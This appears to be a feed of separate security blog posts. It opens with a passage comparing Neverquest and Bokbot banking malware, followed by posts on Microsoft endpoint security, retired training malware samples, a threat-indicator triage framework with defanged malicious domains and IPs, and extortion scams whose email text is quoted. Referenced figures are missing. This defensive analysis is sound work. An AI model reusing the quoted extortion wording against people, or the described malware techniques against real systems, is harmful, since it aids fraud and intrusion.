Reporting config The targeted URLs and “interesting” keywords are almost identical between the two.
Affiliations The two group share business affiliations with other crimeware groups.

Bot ID, URL pattern and project IDs

When both Neverquest and Bokbot communicate with their C2 servers, they have to identify themselves by sending their unique bot ID along with a project ID.

An example of the string that the server uses in order to identify a specific bot from its C2 communication is shown below:


The placement of this string is of course different between the families, where Neverquest (in the latest version) placed it, encoded, in the Cookie header field. Older version of Neverquest sent this information in the URL. Bokbot on the other hand sends it in the URL as shown in a previous section.

One important difference is that Neverquest used a simple number for their project ID, 7, in the example above. Bokbot on the other hand is using a different, unknown format for its project ID. A theory is that this could be the CRC checksum of the project name to prevent any leakage of the number of projects or their names, but this is pure speculation.

Another difference is that Bokbot has implemented an 8 bit checksum that is calculated using the project ID and the bot ID. This checksum is then validated on the server side and if it doesn’t match, no commands will be returned.

To this date there has been a total of 20 projects over 25 build versions observed, numbers that keeps on growing.

Inject config – Dynamic redirect structure

The inject config not only contain web injects but also redirects. Bokbot supports both static redirects which redirects a static URL but also dynamic redirects which redirects a request based on a target matched using a regular expression.

The above example is a redirect attack from a Neverquest config. They use a regular expression to match on the requested URL. If it should match they will extract the name of the requested file along with its extension. The two strings are then used to construct a redirect URL controlled by the actors. Thereby, the $1 will be replaced with the file name and $2 will be replaced with the file extension.


How does this compare with Bokbot?


Notice how the redirect URL contains $1 and $2, just as with Neverquest. This could of course be a coincidence but it should be mentioned that this is something that has only been observed in Neverquest and Bokbot.

Reporting config

This config was one of the very first things that hinted about a connection between the two groups. By comparing the configs it becomes quite clear that there is a big overlap in interesting keywords and URLs:


Neverquest is on the left and Bokbot on the right. Note that this is a simple string comparison between the configs which also includes URLs that are to be excluded from reporting.

“Guilt by association” – Affiliations

None of these groups are short on connections in the cybercrime underworld. It’s already mentioned that Neverquest had ties with Dyre, a group which by itself caused substantial financial losses. But it’s also important to take into account that Dyre didn’t completely go away after the group got dismantled but was rather replaced with TheTrick which gives a further hint of a connection.

Neverquest affil. Bokbot affil. Comment
Dyre TheTrick Neverquest downloads & executes Dyre
Bokbot downloads & executes TheTrick
TinyLoader TinyLoader Neverquest downloads & executes TinyLoader which downloads AbaddosPOS
Bokbot downloads & executes TinyLoader, additional payload remains unknown at this time
Chanitor Chanitor Neverquest utilizes Chanitor for distribution of Neverquest
Bokbot utilizes Chanitor for distribution of Bokbot, downloads SendSafe spam malware to older infections.
Geodo Bokbot utilizes Geodo for distributing Bokbot
Gozi-ISFB Bokbot utilizes Gozi-ISFB for distributing Bokbot

There are a few interesting observations with the above affiliations. The first is for the Chanitor affiliation.

When Bokbot was being distributed by Chanitor, an existing Bokbot infection that was running an older version than the one being distributed by Chanitor, would receive a download & execute command which pointed to the SendSafe spambot, used by the Chanitor group to send spam. Suggesting that they may have exchanged “infections for infections”.

The Bokbot affiliation with Geodo is something that cannot be linked to Neverquest, mostly due to the fact that Geodo has not been running its spam operation long enough to overlap with Neverquest.

The below graph show all the observed affiliations to date.


Events over time

All of the above information have been collected over time during the development and tracking of Bokbot. The events and observations can be observed on the below timeline.


The first occurrence of TheTrick being downloaded was in July 2017 but Bokbot has since been downloading TheTrick at different occasions.

At the end of December 2017 there was little Bokbot activity, likely due to the fact that it was holidays. It’s not uncommon for cybercriminals to decrease their activity during the turn of the year, supposedly everyone needs holidays, even cybercriminals. They did however push an inject config to some bots which targeted *.com with the goal of injecting Javascript to mine Monero cryptocurrency. As soon as an infected user visits a website with a .com top-level domain (TLD), the browser would start mining Monero for the Bokbot actors.  This was likely an attempt to passively monetize the bots while the actors was on holiday.

Bokbot remains active and shows no signs of slowing down. Fox-IT will continue to monitor these actors closely.

Making Sense of Microsoft’s Endpoint Security Strategy

Microsoft is no longer content to simply delegate endpoint security on Windows to other software vendors. The company has released, fine-tuned or rebranded  multiple security technologies in a way that will have lasting effects on the industry and Windows users. What is Microsoft’s endpoint security strategy and how is it evolving?

Microsoft offers numerous endpoint security technologies, most of which include “Windows Defender” in their name. Some resemble built-in OS features (e.g., Windows Defender SmartScreen), others are free add-ons (e.g., Windows Defender Antivirus), while some are commercial enterprise products (e.g., the EDR component of Windows Defender Advanced Threat Protection). I created a table that explains the nature and dependencies of these capabilities in a single place. Microsoft is in the process of unifying these technologies under the Windows Defender Advanced Threat Protection branding umbrella—the name that originally referred solely to the company’s commercial incident detection and investigation product.

Microsoft’s approach to endpoint security appears to be pursuing the following 3 objectives:

  • Motivate other vendors to innovate beyond the commodity security controls that Microsoft offers for its modern OS versions. Windows Defender Antivirus and Windows Defender Firewall with Advanced Security (WFAS) on Windows 10 are examples of such tech. Microsoft has been expanding these essential capabilities to be on par with similar features of commercial products. This not only gives Microsoft control over the security posture of its OS, but also forces other vendors to tackle the more advanced problems on the basis of specialized expertise or other strategic abilities.
  • Expand the revenue stream from enterprise customers. To centrally manage Microsoft’s endpoint security layers, organizations will likely need to purchase System Center Configuration Manager (SCCM) or Microsoft Intune. Obtaining some Microsoft’s security technologies, such as the EDR component of Windows Defender Advanced Threat Protection, requires upgrading to the high-end Windows Enterprise E5 license. By bundling such commercial offerings with other products, rather than making them available in a standalone manner, the company motivates customers to shift all aspects of their IT management to Microsoft.

In pursuing these objectives, Microsoft developed the building blocks that are starting to resemble features of commercial Endpoint Protection Platform (EPP) products. The resulting solution is far from perfect, at least at the moment:

  • Centrally managing and overseeing these components is difficult for companies that haven’t fully embraced Microsoft for all their IT needs or that lack expertise in technologies such as Group Policy.
  • Making sense of the security capabilities, interdependencies and licensing requirements is challenging, frustrating and time-consuming.
  • Most of the endpoint security capabilities worth considering are only available for the latest versions of Windows 10 or Windows Server 2016. Some have hardware dependencies are incompatible with older hardware.
  • Several capabilities have dependencies that are incompatible with other products.  For instance, security features that rely on Hyper-V prevent users from using the VMware hypervisor on the endpoint.
  • Some technologies are still too immature or impractical for real-world deployments. For example, using my Windows 10 system after enabling the Controlled folder access feature became unbearable after a few days.
  • The layers fit together in an awkward manner at times. For instance, Microsoft provides two app whitelisting technologies—Windows Defender Application Control (WDAC) and AppLocker—that overlap in some functionality.

While infringing on the territory traditionally dominated by third-parties on the endpoint, Microsoft leaves room for security vendors to provide value and work together with Microsoft’s security technologies. For example:

Some of Microsoft’s endpoint security technologies still feel disjointed. They’re becoming less so, as the company fine-tunes its approach to security and matures its capabilities. Microsoft is steadily guiding enterprises towards embracing Microsoft as the de facto provider of IT products. Though not all enterprises will embrace an all-Microsoft vision for IT, many will. Endpoint security vendors will need to crystallize their role in the resulting ecosystem, expanding and clarifying their unique value proposition. (Coincidentally, that’s what I’m doing at Minerva Labs, where I run product management.)

Retired Malware Samples: Everything Old is New Again

I’m always on the quest for real-world malware samples that help educate professionals how to analyze malicious software. As techniques and technologies change, I introduce new specimens and retire old ones from the reverse-engineering course I teach at SANS Institute.  Here are some of the legacy samples that were once present in FOR610 materials. Though these malicious programs might not appear relevant anymore, aspects of their functionality are present even in modern malware.

A Backdoor with a Backdoor

To learn fundamental aspects of code-based and behavioral malware analysis, the FOR610 course examined Slackbot at one point. It was an IRC-based backdoor, which it’s author “slim” distributed as a compiled Windows executable without source code.

Dated April 18, 2000, Slackbot came with a builder that allowed its user to customize the name of the IRC server and channel it would use for Command and Control (C2). Slackbot documentation explained how the remote attacker could interact with the infected system over their designated channel and included this taunting note:

“don’t bother me about this, if you can’t figure out how to use it, you probably shouldn’t be using a computer. have fun. –slim”

Those who reverse-engineered this sample discovered that it had undocumented functionality. In addition to connecting to the user-specified C2 server, the specimen also reached out to a hardcoded server that “slim” controlled. The channel #penix channel gave “slim” the ability to take over all the botnets that his or her “customers” were building for themselves.

Turned out this backdoor had a backdoor! Not surprisingly, backdoors continue to be present in today’s “hacking” tools. For example, I came across a DarkComet RAT builder that was surreptitiously bundled with a DarkComet backdoor of its own.

You Are an Idiot

The FOR610 course used an example of a simple malevolent web page to introduce the techniques for examining potentially-malicious websites. The page, captured below, was a nuisance that insulted its visitors with the following message:

When the visitor attempted to navigate away from the offending site, its JavaScript popped up new instances of the page, making it very difficult to leave. Moreover, each instance of the page played the following jingle on the victim’s speakers. “You are an idiot,” the song exclaimed. “Ahahahahaha-hahahaha!” The cacophony of multiple windows blasting this jingle was overwhelming.


A while later I came across a network worm that played this sound file on victims’ computers, though I cannot find that sample anymore. While writing this post, I was surprised to discover a version of this page, sans the multi-window JavaScript trap, residing on Maybe it’s true what they say: good joke never gets old.

Clipboard Manipulation

When Flash reigned supreme among banner ad technologies, the FOR610 course covered several examples of such forms of malware. One of the Flash programs we analyzed was a malicious version of the ad pictured below:

At one point, visitors to legitimate websites, such as MSNBC, were reporting that their clipboards appeared “hijacked” when the browser displayed this ad. The advertisement, implemented as a Flash program, was using the ActionScript setClipboard function to replace victims’ clipboard contents with a malicious URL.

The attacker must have expected the victims to blindly paste the URL into messages without looking at what they were sharing. I remembered this sample when reading about a more recent example of malware that replaced Bitcoin addresses stored in the clipboard with the attacker’s own Bitcoin address for payments.

As malware evolves, so do our analysis approaches, and so do the exercises we use in the FOR610 malware analysis course.  It’s fun to reflect upon the samples that at some point were present in the materials. After all, I’ve been covering this topic at SANS Institute since 2001. It’s also interesting to notice that, despite the evolution of the threat landscape, many of the same objectives and tricks persist in today’s malware world.

Kinetic and Potential Energy Framework: Applying Thermodynamics to Threat Intelligence

ThreatConnect conducts a thought experiment and proposes a framework for evaluating and triaging indicators based on physical energy properties

All variety of scientists, from chemists to physicists and engineers, measure kinetic and potential energies to better understand how objects are acting or will act within a given situation or system. We posit that these energy concepts can be applied to threat intelligence as a framework to better understand and evaluate indicators and the intelligence associated with them.

Cyber threat intelligence consumers or producers can use this kinetic and potential energy framework to accomplish the following:

  • Scrutinize indicators for the relevant context that would ultimately constitute "intelligence."
  • Evaluate and triage indicators, reported activity, and intelligence feeds or reports based on basic, inherent intelligence requirements.
  • Differentiate indicators' scores based on their relevance to a specific industry or set of intelligence requirements.
  • Identify intelligence gaps and collection requirements to further enable a threat intelligence program.
  • Share the necessary context or calculated energies to facilitate a consumer's integration of provided information.

We'll start by describing some common issues with threat intelligence that we hope the application of this framework can mitigate or deter.

Issues with Cyber Threat Intelligence

Intelligence Requirements

At many organizations, incident responders or security operations center (SOC) personnel might be dual-hatted and also serve as threat intelligence analysts. Organizations with dedicated threat intelligence teams or individuals are uncommon, and many times those organizations still have issues integrating intelligence analysts with the typical incident response function and wind up not seeing or realizing the full potential of threat intelligence. Those shortcomings often manifest in specific problems like a lack of intelligence requirements.

If you're asking what are intelligence requirements and why do they matter, don't worry, you're not alone. To summarize, intelligence requirements essentially identify what intelligence analysts at a given organization focus on. If you consider the intelligence cycle, intelligence requirements are a part of the planning and direction step.

The Intelligence Cycle

The Intelligence Cycle

Let's say you're an organization operating in the healthcare sector. A very basic intelligence requirement for your organization might be to identify activity targeting the healthcare sector. That requirement would then dictate the sources of information that you collect or procure, how you would process and exploit that information, the specific intelligence analysis that you produce from exploiting that collection, and what and how you disseminate and integrate that analysis at your organization.

Oftentimes organizations don't have any identified intelligence requirements. When that's the case, threat intelligence research without intelligence requirements is just surfing the web. Conversely some organizations will say that they want to know about everything so "everything" is their intelligence requirement. If everything is your intelligence requirement, you'll end up being inefficient with your defensive resources. Intelligence requirements also have to be relatively specific so that the execution against them within the intelligence cycle can be tracked.

Morpheus Meme

For organizations that are getting started with threat intelligence or don't already have identified intelligence requirements, there are basic intelligence requirements that your organization can use. These might seem overly simplified - which they are - but they are still significantly more specific than "everything" and can give threat intelligence teams a general heading. Those basic intelligence requirements include the following:

  • Activity targeting my sector
  • Activity targeting my organization
  • Activity targeting specific data types that my organization secures (eg. protected health information or PHI)
  • Activity emanating from my known adversaries

"Intelligence" Feeds or Reports

Indicators in and of themselves are not threat intelligence, but too often feeds and reports will claim to be intelligence when really they are only indicators. Context maketh intelligence. Consider the Grizzly Steppe Joint Analysis Report from two years ago. There were hundreds of indicators shared in that report, but the context that was shared with each of those indicators was insufficient to actually qualify them as intelligence. Ideally, cyber threat intelligence feeds and sources would answer all (or at least two) of the following, which generally correspond to the vertices and axes on the Diamond Model of Intrusion Analysis:

  • Who the bad guys are
  • What they are doing
  • How they are doing it
  • Who they are doing it against
  • Why they are doing it
  • What they will do next

Focus on Known Bad

Finally, the last issue worth noting is a general focus on known bad activity or indicators. Don't get us wrong, this is completely necessary. But it fails to recognize the fact that, if we are employing threat intelligence to its fullest extent, we can proactively identify indicators that might be used in malicious activity in the future but aren't yet known to be malicious. What you're left with is playing whack a mole with indicators that possibly are not even being used in operations by the time that you hear about them.

By using this kinetic and potential energy framework, organizations can triage indicators and activity using basic intelligence requirements, scrutinize reports for relevant intelligence, evaluate their intelligence sources or reports, and include a more proactive approach to defense that incorporates suspicious indicators.

A Quick Thermodynamics Lesson

Kinetic and potential are different states of energy that describe the capability of an object to do work. Kinetic energy results from an object in motion, such as a moving car. Potential energy comes from an object's position and may be converted into kinetic energy, such as a ball held above the ground or a compressed spring. To measure and understand these energies over time scientists have to measure things like an object's velocity, vector, height, and compression, while also taking into account energy-degrading factors like friction or gravity.

To better explain kinetic and potential energy, let's consider a bow and arrow. A bow and arrow by themselves have no energy. When a bow is drawn to shoot the arrow, energy is put into the bow and arrow system. This energy is potential energy and is held in the drawn string of the bow. That potential energy can then be transferred into the arrow by releasing the string and shooting the arrow. At that point, the arrow that is flying through the air has kinetic energy while the potential energy in the bow is gone. This kinetic energy will then degrade as friction from the air and gravity act on the arrow until it hits its target or falls to the ground.

Let's now consider that there is an arrow that we have to physically defend our organization against. Generally, this arrow has several characteristics that we want to understand to determine if and how we defend against it:

  • Whether the bow has been drawn
  • Whether the arrow has been shot
  • Where the arrow was shot from
  • What the arrow was shot at
  • How fast the arrow is traveling
  • Who shot the arrow

Correlation to Threat Intelligence

Those characteristics about the arrow that we want to understand are essentially threat intelligence and those arrows aren't significantly dissimilar from indicators. In some cases there are indicators that we aren't going to care about because they weren't shot at our organization or any similar organizations.

Those things that we want to know about arrows relate to our intelligence requirements. Many of those intelligence requirements manifest in the physical energy properties - was the arrow shot, how fast and where is it traveling, is the bow drawn -- so maybe indicators have relatable energies that we can measure to evaluate and better understand them.

Factors to Measure

When considering kinetic and potential energies for indicators there are certain variables that we want to make sure to include in our equations to capture the necessary data points for the indicators we're evaluating. These factors mimic those that scientists measure to calculate energies. For kinetic energy, we want to include velocity, vector (or direction), and it's degradation over time:

  • Velocity is simply going to be binary -- is it active or not.
  • Vector will be a combination of binary, relative factors. Depending on your frame of reference -- the organization you're in, your sector, the data you safeguard -- that calculated vector will be different.
  • Degradation, much like gravity or friction ultimately reduce kinetic energy, time will reduce the kinetic energy of an indicator.

For potential energy, it is a bit more nebulous. The main variables we're interested in are the compression or height and the degradation over time:

  • Compression/Height is where things might get sticky. This is going to be binary and relative to our frame of reference, like the vector for kinetic energy, but it is going to necessitate a better understanding of our adversary and their tactics.
  • Degradation is similar to what it is for kinetic energy with time ultimately reducing the potential energy of an indicator.

Our Equations

As we considered those factors that play into kinetic and potential energy, we ultimately generated the below equations to measure those energies. Keep in mind that these are the equations that we've developed to account for the aforementioned factors in the cyber world. The way that your organization views these factors and ultimately uses them to measure kinetic and potential energy may differ. More on that later.

Kinetic Energy

Velocity Vector Degradation

Kinetic energy for a given indicator is relative, meaning it is going to be different based on who is evaluating it and what organization they are a part of. Usually, any indicator with a kinetic energy greater than 0 deserves additional attention and the higher the kinetic energy, the more pertinent the indicator is going to be to the individual/organization evaluating it. Considering the scale below, the more of those inherent intelligence requirements that an indicator hits on, the higher kinetic energy it will have and thus increase its relevance to your organization.


Let's break down the different factors in the equation:

  • Velocity: To start off, if the indicator hasn't actually been used in an operation, U is going to be 0 so the kinetic energy is going to be 0. In that case, we'd move to potential energy and evaluate that.
  • Vector: S+O+D+A really represents those distilled, basic, inherent intelligence requirements referenced earlier. For our equation, we're treating all of these factors equally, but when doing this for your organization, you might choose to change it up a bit. This part of the equation represents essentially where that indicator is directed.
  • Degradation: The kinetic energy is going to decrease over time and ultimately approach 0 based on a deprecation period.

Potential Energy

Potential energy should only be evaluated when an indicator is not known to have been used in an attack. Potential energy correlates with what might happen that is relevant to a given organization based on known adversaries. When indicators with potential energy greater than 0 are addressed, organizations are being proactive in defense. These are the factors in the potential energy equation:

  • Compression/Height: Potential energy necessitates an understanding of your adversaries and their tactics. When those things aren't known, that can be considered an intelligence gap.
  • Degradation: Like with kinetic energy, potential energy will also degrade or deprecate over time. It should be noted however that the period over which you deprecate these suspicious indicators might be different than the period over which you deprecate known bad indicators.

Applying the Equations

Now we'll apply these equations and use these energies to better understand a group of indicators. We'll evaluate these indicators from the perspective of five different organizations. A financial company specifically working with cryptocurrency, and pharmaceutical, media, sporting, and think tank organizations. The indicators we'll evaluate include the following:

  • Arkouowi[.]com was identified in an Accenture report on 2018 Hogfish (aka APT10) operations targeting organizations in Japan; however, no context was given for the type of sector or data that was targeted. APT10 is known to have targeted financial and pharmaceutical organizations, among others.
  • Ikmtrust[.]com was identified in an Arbor Network 2018 report on Fancy Bear lojack operations, but no targeted sector or data type were included in the report. Fancy Bear is known to have targeted media, sport, and think tank organizations, among others.
  • 222.122.31[.]115 was identified in an Intezer report as part of a Hidden Cobra operation targeting the financial sector. Specifically they targeted data and organizations related to cryptocurrency. Hidden Cobra is known to have targeted financial and media organizations.
  • Fifacups[.]org was not identified in operations, but the domain was registered (Incident 20180326A: Domains Using Suspicious Name Servers and Hosted on Dedicated Servers) through a suspicious name server and as of July 24 2018 is hosted on a dedicated server at 5.135.237[.]219. Those tactics are consistent with previously identified Fancy Bear tactics.
  • Atlanticouncil[.]org was not identified in operations, but the domain was registered (Incident 20180611A: Additional Patchwork Infrastructure) at essentially the same time and through the same registrar as domains identified in Volexity report on a Patchwork activity targeting US think tanks. As of July 23 2018, this domain is also hosted on a dedicated server at 176.107.177[.]7. Patchwork is known to have targeted US think tanks and Chinese political and military organizations, among others.

Based on the above intelligence related to these indicators, we can calculate the kinetic and potential energy for each based on the organizations we previously mentioned. For the purposes of these calculations, we'll assume that the financial cryptocurrency organization deprecates malicious and indicators after 180 days, while all of the rest deprecate them after 360 days. We'll also assume that all of the organizations deprecate suspicious indicators after 360 days. Here are examples for two of the indicators:



Since this indicator has not been identified in operations (our U variable is 0), the kinetic energy is 0 so we then proceed to evaluate potential energy.

indicators equation 2

Understanding Results

Based on a calculation date of July 24 2018, we ultimately come up with the below measurements for these indicators' kinetic and potential energies.

When we rack and stack the findings for each organization, we can see how organizations might go about prioritizing the review of some indicators before others. For example, the 222.122.31[.]115 IP address would be a higher priority for the financial cryptocurrency organization while a lower one for the media organization.

We also see that, within these results, there are no potential energy scores for the financial or pharmaceutical organizations. If we conduct this analysis for a number of our sources and don't have any potential energy scores, that is something that can feed our collection requirements. In that case, we need to pursue different sources that focus on identifying suspicious indicators associated with our specific adversaries' tactics.

Important Notes

There are several important notes to mention now that we've employed the framework and gone through the analysis. To start off, it is important to note that potential and kinetic energy shouldn't be directly related because they aren't a one to one comparison. How you treat both most likely will differ.

When you're going through this analysis, everytime you say to yourself "I don't know" that is an intelligence gap. The more you work through those intelligence gaps, the more you'll build a baseline for who to follow and why. An important aspect of this framework is that it requires a general understanding of your adversaries or forces you to learn about them. It may be worthwhile to conduct a capability vs. intent assessment of adversaries prior to employing this framework to determine which adversaries are most pertinent to your organization.

Whenever you have a lack of or very low score of either type of energy, that is a collection gap. Procuring or acquiring additional sources may help mitigate those deficiencies and result in better intelligence for your organization.

From the intelligence publisher/creator perspective, this framework can be applied to improve the utility of what they share. If they find that they can't identify the variables that go into these equations from their reports, there is some additional context there that they should investigate and share if possible. Additionally, if they were to provide calculated kinetic and potential energies for affected organizations along with their reports, then that might facilitate consumption and integration of their intelligence.

It's also important to note that for some reports that are one instance of specific activity, you only have to calculate the scores for a single indicator. That same score would then be accurate for all other indicators in that report or directly related to its relevant activity. For example, the IP addresses 5.135.237[.]219 and 176.107.177[.]7, which respectively host fifacups[.]org and atlanticouncil[.]org, would have the same potential energy scores as the domains.


While we went over our specific equations for kinetic and potential energy, this idea and the equations are extensible. The main issue is capturing the velocity, vector, and degradation. But maybe you want to treat your assessment of that vector differently. Maybe you want to include other basic intelligence requirements like the country targeted, if so, this is how your equation might look, where L is whether your location/country was targeted in the activity:

Or maybe you want to exclude unknown variables to mitigate shortcomings in reporting. Using n, where n is the number of variables you're actually including, instead of 4 could do that:

Or maybe you want to weight certain variables differently to reflect more important intelligence requirements. This is maybe a way that equation would look, where activity targeting your organization is more important than the other variables:

Regardless of what intelligence requirements you want to include, the vector factor of the equation is where you can easily change things up based on your own organization's specific intelligence needs. Additionally, you may want to consider altering the degradation aspect of the equation. For example, you may choose to deprecate the kinetic energy for files over a longer period (540 days) than that for hosts (360 days). In that case, your equations might look like the following:

Caveats and Conclusions

There are several caveats related to this idea and framework that we should also mention. First and foremost, this framework isn't going to be for everyone and its utility may hinge on your threat intelligence program's maturity. Some organizations may completely discount it as they already have a different process in place to evaluate indicators against their intelligence requirements. Others might not have the resources to run through this framework. Others also might just not think this framework is useful. We're hoping though that some organizations might find this useful either as a thought experiment, or to audit their intelligence program and identify intelligence and collection gaps, or maybe to even incorporate into their daily processes. Regardless of where you fall on that spectrum, we'd love to hear back from you on this idea and any thoughts you have on it.

Finally, it's worth noting that at this point, this is a manual process and more of an analytic technique or framework; however, we are investigating ways to employ this at scale and include it in our own intelligence reports. A lack of standards in industry reports and feeds could ultimately complicate automation efforts, so that is something else we are taking into account.

We've also created a data sheet summarizing this framework, complete with a worksheet to employ it against indicators.

The post Kinetic and Potential Energy Framework: Applying Thermodynamics to Threat Intelligence appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Scammers Use Breached Personal Details to Persuade Victims

Scammers use a variety of social engineering tactics when persuading victims to follow the desired course of action. One example of this approach involves including in the fraudulent message personal details about the recipient to “prove” that the victim is in the miscreant’s grip. In reality, the sender probably obtained the data from one of the many breaches that provide swindlers with an almost unlimited supply of personal information.

Personalized Porn Extortion Scam

Consider the case of an extortion scam in which the sender claims to have evidence of the victim’s pornography-viewing habits. The scammer demands payment in exchange for suppressing the “compromising evidence.” A variation of this technique was documented by Stu Sjouwerman at KnowBe4 in 2017. In a modern twist, the scammer includes personal details about the recipient—beyond merely the person’s name—such as the password the victim used:

“****** is one of your password and now I will directly come to the point. You do not know anything about me but I know alot about you and you must be thinking why are you getting this e mail, correct?

I actually setup malware on porn video clips (adult porn) & guess what, you visited same adult website to experience fun (you get my drift). And when you got busy enjoying those videos, your web browser started out operating as a RDP (Remote Desktop Protocol) that has a backdoor which provided me with accessibility to your screen and your web camera controls.”

The email includes demand for payment via cryptocurrency such Bitcoin to ensure that “Your naughty secret remains your secret.” The sender calls this “privacy fees.” Variations on this scheme are documented in the Blackmail Email Scam thread on Reddit.

The inclusion of the password that the victim used at some point in the past lends credibility to the sender’s claim that the scammer knows a lot about the recipient. In reality, the miscreant likely obtained the password from one of many data dumps that include email addresses, passwords, and other personal information stolen from breached websites.

Data Breach Lawsuit Scam

In another scenario, the scammer uses the knowledge of the victim’s phone number to “prove” possession of sensitive data. The sender poses as an entity that’s preparing to sue the company that allegedly leaked the data:

“Your data is compromised. We are preparing a lawsuit against the company that allowed a big data leak. If you want to join and find out what data was lost, please contact us via this email. If all our clients win a case, we plan to get a large amount of compensation and all the data and photos that were stolen from the company. We have all information to win. For example, we write to your email and include part your number ****** from a large leak.”

The miscreant’s likely objective is to solicit additional personal information from the victim under the guise of preparing the lawsuit, possibly requesting the social security number, banking account details, etc. The sender might have obtained the victim’s name, email address and phone number from a breached data dump, and is phishing for other, more lucrative data.

What to Do?

If you receive a message that solicits payment or confidential data under the guise of knowing some of your personal information, be skeptical. This is probably a mass-mailed scam and your best approach is usually to ignore the message. In addition, keep an eye on the breaches that might have compromised your data using the free and trusted service Have I Been Pwned by Troy Hunt, change your passwords when this site tells you they’ve been breached, and don’t reuse passwords across websites or apps.

Sometimes an extortion note is real and warrants a closer look and potentially law enforcement involvement. Only you know your situation and can decide on the best course of action. Fortunately, every example that I’ve had a chance to examine turned out to be social engineering trick that recipients were best to ignore.

To better under understand persuasion tactics employed by online scammers, take a look at my earlier articles on this topic:


Building Daily Habits to Stay Ahead of Security Fires

ThreatConnect's New OSINT Dashboard

It's a terrible cliche that so many security teams spend much of their time fighting fires. I'm not saying it's not a big problem, but I am saying that it's the responsibility of the security professional to ensure that they still make time for routine foundational activities that, over time, build up to result in fewer and fewer fires. I'm not just talking about continuing education, I'm talking about the daily habits that help you both prevent the fires and make you better at fighting them when they happen.

Building Habits

Even if it's just five minutes a day, what matters most is getting into the habits. Let me give you an example. At ThreatConnect, we've developed an "OSINT Dashboard." This dashboard is designed for a quick, five minute perusal as soon as you login to your ThreatConnect account, when you're sitting down to your daily cup of coffee (or whatever your favorite poison). It's not meant to take up a lot of time on deep dives, or be a confounding mess of tactical indicators and irrelevant intelligence. It's meant as a basic leaping-off point to keep you on top of the struggles you might encounter later in the day/week/month/hopefully-never.

The dashboard is accessible to all users of our free Cloud environment (URL) by hovering over the "Dashboard" menu and selecting "OSINT Dashboard." Let's take a look at some of what you'll find on the dashboard.


OSINT Tied to Named CVEs

A lot of vulnerabilities that get reported never actually show up on the wild. The point of this datatable is to give you insight into what's actually showing you up by showing top CVEs tied to real intel. In a world of triage, these are the vulnerabilities you should consider paying attention to.


Latest Technical Blogs & Reports

In the old days, building five minute habits meant wading through dozens of your favorite blogs (and likely going over the time limit). No more! The "Technical Blogs & Reports" source in ThreatConnect is a curated, machine- and human-readable collection of more than a hundred blogs and reports from leading security companies, intel providers, academia, and armchair enthusiasts. Rather than needing to check through everything, this dashboard card compiles all of that information into the latest and greatest.


Latest Intel

Sometimes five minute habits can result in deeper dives, and that's okay. If something piques your interest, you should have the option of learning more. This card shows how many pieces of intel have come in in the past week, and by clicking on any item you can find out more. Want the latest Adversary intel? Click Adversary. Want to learn about the latest Campaigns? Click Campaign!

A Starting Point

These are just a sampling of the information available on the dashboard. Since it's free, I'd encourage you to check it out for yourself and consider incorporating it into part of your daily routine.

Ultimately, the habits you build need to make sense to you. They need to be relevant. For our TC ManageTM, TC AnalyzeTM, and TC CompleteTM customers, you can actually create your own habit-forming dashboards. For example, if your "morning cup of coffee" routine includes reading about the latest threats from China, you can create a dashboard with that in mind. If your daily routine involves your favorite malware family, you can do that, too.

The post Building Daily Habits to Stay Ahead of Security Fires appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Cyber is Cyber is Cyber

If you’re in the business of safeguarding data and the systems that process it, what do you call your profession? Are you in cybersecurity? Information security? Computer security, perhaps? The words we use, and the way in which the meaning we assign to them evolves, reflects the reality behind our language. If we examine the factors that influence our desire to use one security title over the other, we’ll better understand the nature of the industry and its driving forces.

Until recently, I’ve had no doubts about describing my calling as an information security professional. Yet, the term cybersecurity is growing in popularity. This might be because the industry continues to embrace the lexicon used in government and military circles, where cyber reigns supreme. Moreover, this is due to the familiarity with the word cyber among non-experts.

When I asked on Twitter about people’s opinions on these terms, I received several responses, including the following:

  • Danny Akacki was surprised to discover, after some research, that the origin of cyber goes deeper than the marketing buzzword that many industry professionals believe it to be.
  • Paul Melson and Loren Dealy Mahler viewed cybersecurity as a subset of information security. Loren suggested that cyber focuses on technology, while Paul considered cyber as a set of practices related to interfacing with adversaries.
  • Maggie O’Reilly mentioned Gartner’s model that, in contrast, used cybersecurity as the overarching discipline that encompasses information security and other components.
  • Rik Ferguson also advocated for cybersecurity over information security, viewing cyber as a term that encompasses muliple components: people, systems, as well as information.
  • Jessica Barker explained that “people outside of our industry relate more to cyber,” proposing that if we want them to engage with us, “we would benefit from embracing the term.”

In line with Danny’s initial negative reaction to the word cyber, I’ve perceived cybersecurity as a term associated with heavy-handed marketing practices. Also, like Paul, Loren, Maggie and Rik, I have a sense that cybersecurity and information security are interrelated and somehow overlap. Jessica’s point regarding laypersons relating to cyber piqued my interest and, ultimately, changed my opinion of this term.

There is a way to dig into cybersecurity and information security to define them as distinct terms. For instance, NIST defines cybersecurity as:

“Prevention of damage to, protection of, and restoration of computers, electronic communications systems, electronic communications services, wire communication, and electronic communication, including information contained therein, to ensure its availability, integrity, authentication, confidentiality, and nonrepudiation.”

Compare that description to NIST’s definition of information security:

“The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability.”

From NIST’s perspective, cybersecurity is about safeguarding electronic communications, while information security is about protecting information in all forms. This implies that, at least according to NIST, information security is a subset of cybersecurity. While this nuance might be important in some contexts, such as regulations, the distinction probably won’t remain relevant for long, because of the points Jessica Barker raised.

Jessica’s insightful post on the topic highlights the need for security professionals to use language that our non-specialist stakeholders and people at large understand. She outlines a brief history that lends credence to the word cyber. She also explains that while most practitioners seem to prefer information security, this term is least understood by the public, where cybersecurity is much more popular. She explains that:

“The media have embraced cyber. The board has embraced cyber. The public have embraced cyber. Far from being meaningless, it resonates far more effectively than ‘information’ or ‘data’. So, for me, the use of cyber comes down to one question: what is our goal? If our goal is to engage with and educate as broad a range of people as possible, using ‘cyber’ will help us do that. A bridge has been built, and I suggest we use it.”

Technology and the role it plays in our lives continues to change. Our language evolves with it. I’m convinced that the distinction between cybersecurity and information security will soon become purely academic and ultimately irrelevant even among industry insiders. If the world has embraced cyber, security professionals will end up doing so as well. While I’m unlikely to wean myself off information security right away, I’m starting to gradually transition toward cybersecurity.

Communicating About Cybersecurity in Plain English

When cybersecurity professionals communicate with regular, non-technical people about IT and security, they often use language that virtually guarantees that the message will be ignored or misunderstood. This is often a problem for information security and privacy policies, which are written by subject-matter experts for people who lack the expertise. If you’re creating security documents, take extra care to avoid jargon, wordiness and other issues that plague technical texts.

